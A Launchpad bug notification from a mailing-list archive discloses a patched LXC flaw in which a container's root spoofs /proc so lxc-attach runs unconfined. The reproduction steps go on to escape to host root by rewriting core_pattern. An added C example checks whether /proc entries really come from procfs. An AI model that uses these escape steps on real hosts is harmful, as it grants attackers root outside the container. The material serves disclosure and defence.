
touch-packages team mailing list archive

[Bug 1475050] Re: unprivileged guest to host real-root escape via lxc-attach

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1475050

Title:
  unprivileged guest to host real-root escape via lxc-attach

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found that lxc-attach
  attempts to read guest mount namespace /proc entries before confining
  to the new apparmor policy and dropping host uid/gid. By unmounting /proc
  within the guest as root and replacing it with a rogue version, lxc-attach
  fails to apply the new security policy and also to apply
  PR_SET_SECCOMP. Therefore getting the "unconfined" apparmor profile
  requires only a single invocation of lxc-attach. The unconfined settings
  already allow bind mounts, pivot_root and some other quite powerful
  syscalls, so a second round of lxc-attach might not be needed. Currently
  the second round uses a host guest uid=0 process to attach to a real euid=0
  process and then escalate to full host root privileges, e.g. via
  modifying /proc/sys/kernel/core_pattern and triggering a core dump.

  Steps to reproduce:

  Get unconfined:
  ===============

  * Use SSH to get arbitrary number of unconfined sessions,
    just convenience for testing:

  apt-get install openssh-server
  stop ssh

  Edit /etc/ssh/sshd_config to allow password login

  Set root password

  * Prepare to lock next lxc-attach to get "unconfined":

  mount -t tmpfs tmpfs /proc/1
  mknod /proc/1/status p

  * Replace /bin/sh or link it to sshd instead, for testing call it
  directly:

  lxc-attach --name testguest /usr/sbin/sshd

  * In guest make apparmor fail by second tmpfs mount:

  ps aux | grep lxc-attach

  pid=554
  mount -t tmpfs tmpfs "/proc/${pid}/attr"
  touch "/proc/${pid}/attr/current"
  chmod 0666 "/proc/${pid}/attr/current"
  echo "" > /proc/1/status

  * Use the unconfined shells:

  # cat /proc/self/attr/current
  lxc-container-default (enforce)

  # ssh root@localhost
  ...
  # cat /proc/self/attr/current
  unconfined

  * Wait for the next lxc-attach, use unconfined to escape:

  lxc-attach --name testguest /bin/true

  In guest:

  cat <<EOF > /escape
  #!/bin/sh
  echo "|/bin/sh -c /var/lib/lxc/*/rootfs/escape2" > /proc/sys/kernel/core_pattern
  EOF
  chmod 0755 /escape

  cat <<EOF > /escape2
  #!/bin/sh
  touch /this-should-be-on-outside
  EOF
  chmod 0755 /escape2

  ps aux | grep lxc-attach
  /root/Testing/PtraceHelper 2688

  ulimit -c unlimited
  sleep 100 &
  kill -SEGV 3030

  Affected system:

  # lsb_release -rd
  Description:    Ubuntu 14.04.2 LTS
  Release:        14.04

  # apt-cache policy lxc
  lxc:
    Installed: (none)
    Candidate: 1.0.7-0ubuntu0.1
    Version table:
       1.0.7-0ubuntu0.1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages
       1.0.3-0ubuntu3 0
          500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1475050/+subscriptions
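The root cause in the report is that a privileged helper trusted files under the container's /proc without verifying that they were really served by procfs, so a tmpfs mounted over /proc/1 or /proc/<pid>/attr, with a FIFO or a writable regular file planted in it, was read as if it were kernel-provided state. The check below is an added example written for this page, not lxc's own code or the actual fix: it assumes Linux (statfs(2) and PROC_SUPER_MAGIC from <linux/magic.h>) and refuses to read a /proc entry unless it lives on a procfs superblock and is a regular file (lstat rejects symlinks, S_ISREG rejects the FIFO created with mknod in the report). Both tmpfs overlays from the reproduction steps fail the f_type comparison.

```c
/* Added example (not lxc's code): validate a /proc path before trusting it.
 * Assumes Linux: statfs(2) and PROC_SUPER_MAGIC from <linux/magic.h>. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/vfs.h>
#include <linux/magic.h>

/* Return 1 if path is on a real procfs superblock, 0 if on any other
 * filesystem (e.g. a tmpfs mounted over /proc/1), -1 if statfs fails. */
int is_procfs(const char *path)
{
    struct statfs sfs;
    if (statfs(path, &sfs) != 0)
        return -1;
    return sfs.f_type == PROC_SUPER_MAGIC ? 1 : 0;
}

/* Return 1 only if path is a regular file served by procfs. A FIFO
 * (mknod ... p), a symlink, or a file on an overlaid tmpfs all return 0. */
int is_trusted_proc_file(const char *path)
{
    struct stat st;
    if (is_procfs(path) != 1)
        return 0;
    if (lstat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) ? 1 : 0;
}

/* Build "/proc/<pid>/<leaf>" into out and check it. Returns 1 when the
 * entry is safe to read, 0 otherwise (including when the path is too long). */
int check_proc_pid_entry(pid_t pid, const char *leaf, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "/proc/%ld/%s", (long)pid, leaf);
    if (n < 0 || (size_t)n >= outlen)
        return 0;
    return is_trusted_proc_file(out);
}

/* Convenience wrapper: is our own /proc/<pid>/status trustworthy? */
int self_status_trusted(void)
{
    char buf[64];
    return check_proc_pid_entry(getpid(), "status", buf, sizeof buf);
}

int main(void)
{
    /* Constructed demo: check the two entries the report tampers with. */
    const char *leaves[] = { "status", "attr/current" };
    char buf[64];
    for (size_t i = 0; i < sizeof leaves / sizeof leaves[0]; i++) {
        int ok = check_proc_pid_entry(getpid(), leaves[i], buf, sizeof buf);
        printf("%s: %s\n", buf,
               ok ? "trusted procfs file" : "NOT trusted, refusing to read");
    }
    return 0;
}
```

A helper that reads per-process state on behalf of a less privileged namespace should run this kind of check, or better, read from a procfs it mounted itself, before it opens anything under /proc; the fstype check is what distinguishes kernel-provided state from attacker-provided files at the same path.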